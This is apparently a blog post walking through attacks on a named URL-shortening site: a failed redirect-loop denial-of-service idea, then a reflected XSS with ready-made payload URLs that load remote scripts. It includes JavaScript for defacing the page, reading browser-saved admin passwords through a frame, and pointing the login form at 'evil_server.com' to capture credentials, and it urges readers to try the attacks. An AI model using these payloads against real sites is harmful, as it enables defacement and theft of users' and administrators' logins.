Ok, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind, a DoS attack, I wanted to make the webserver loop infinitely to find the website. For example I shortened the url http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234 and vice versa
I thought this would make the server loop over and over to find the original link, but nah, it doesn’t work like that, the server just send the original –the shortened- url back to the browser, and it’s the browser’s work to fetch the new url. So this is useless because even the browser detects redirect loops (5 loops and it break the request) http://en.wikipedia.org/wiki/URL_redirection#Redirect_loopsNow to XSS, a simple check shows that the website is XSS’able, here’s a simple alert() test alert(1)'>http://shr1nk.me/index.php?url="></a><script>alert(1)</script>, it doesn’t work for me in Google Chrome, so Firefox it.
Let’s explore 3 categories of attacks that might be exploited using XSS, of course combining these techniques will have bigger impact.
Reputation :
We can make a websites’ reputation as bad as we want, by inserting inappropriate content, or post false news etc.. Remember! users have to click your link to see this, because it is not a persistent XSS attack.For example if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this.
- //Write some annoying messages
- var b = document.getElementById('contenu');
- var s = "<h1>You freeking -stupid- visitors, get lost from here (just an example) ok!</h1>";
- b.innerHTML = s + <img src='some evil pirate image here'/>
Password Theft :
I have explained this in details here http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html, and here is a simple customized version of how to steel the admin passwords if they are saved by the browser, transparently. The victim has to just click of the link and BOM!!!!http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E
- var frameset = document.createElement('frameset');
- var frame1 = document.createElement('frame');
- document.body.appendChild(frameset);
- frame1.setAttribute('src','admin/');
- frameset.appendChild(frame1);
- function showLogin()
- {
- alert('login : ' + parent.frames[0].document.getElementById('username').value +
- '\npass : '+parent.frames[0].document.getElementById('password').value);
- }
- setTimeout(showLogin,1000);
- // here, send the logins to the attackes server using XHR
Trapping the victim to submit his logins :
This uses the same technique as the password theft, When combined with the previous one it become so dangerous unless the user is aware of how XSS works or has an XSS blocker like NoScript or is using IE8.The idea is to show the victim a login page, and changing the action of the form to point to the attackers' server rather than the real login page, a simple attack would be exploited like this:
- var frameset = document.createElement('frameset');
- var frame1 = document.createElement('frame');
- document.body.appendChild(frameset);
- frame1.setAttribute('src','admin/');
- frameset.appendChild(frame1);
- // HERE make the faked iFrame stretched to hide the real page
- // using the stype attribute
- //Now change the action of the form to point to the victims server
- // or do it using XHR then submit the form to its real action
- parent.frames[0].document.forms[0].action = "http://evil_server.com/intercept_passwords.aspx";
- // here, send the logins to the attackes server using XHR
I’m aware this was not detailed enough, but the subject is really vast, so if you plan to learn XSS, start applying simple attacks, like the first and second listed here (you have a working source code). Then you will start to see clearly how some advanced attacks –like the last one- are exploited. Also I advise this book : http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543.
